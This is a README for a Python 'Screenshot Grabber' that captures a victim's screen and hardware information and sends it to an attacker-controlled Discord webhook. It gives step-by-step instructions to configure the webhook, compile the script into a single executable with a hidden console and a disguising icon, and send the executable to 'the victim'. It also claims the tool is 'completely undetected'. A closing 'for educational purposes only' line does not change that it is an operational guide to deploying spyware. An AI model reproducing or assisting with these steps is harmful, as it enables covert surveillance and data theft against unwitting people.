- ✅ Customizable Webhook address and name
- ✅ Shows Screenshot and Hardware info directly in the webhook
- ✅ Completly undetected
- ✅ Simple to use
- 📍 After config you have to convert the python file to .exe manually with
auto-py-to-exe
(Tutorial below)
-
Create a Discord Webhook on your server and copy the address
-
Download the script with Terminal
git clone https://github.com/asisamko/Screenshot-Grabber-Webhook.git
or normally download the ZIP file from Code > Download ZIP
- Open up the folder with the script
- Install dependencies
pip install -r requirements.txt
- 🚩 Open the
grabber.py
in a Text Editor Notepad or better VSC and edit the Webhook address and the name - 🚩 I recommend you to convert the script to .exe before sending it to the victim (Tutorial below)
- Install
auto-py-to-exe
with pip
pip install auto-py-to-exe pyinstaller
- Build the executable file (opens GUI)
auto-py-to-exe
- Select the path to the
grabber.py
- Select ONEFILE option! (--onefile)
- Select Hide the console (--windowed)
- Select an icon (must be .ICO) (--icon)
- In advanced input .exe file name (--name)
- Hit the Convert Button! THAT'S ALL
You should get an executable file (.exe) that you can send to the victim. ✅
Thanks for using/editing my script. 😉
For educational purposes only! ⛔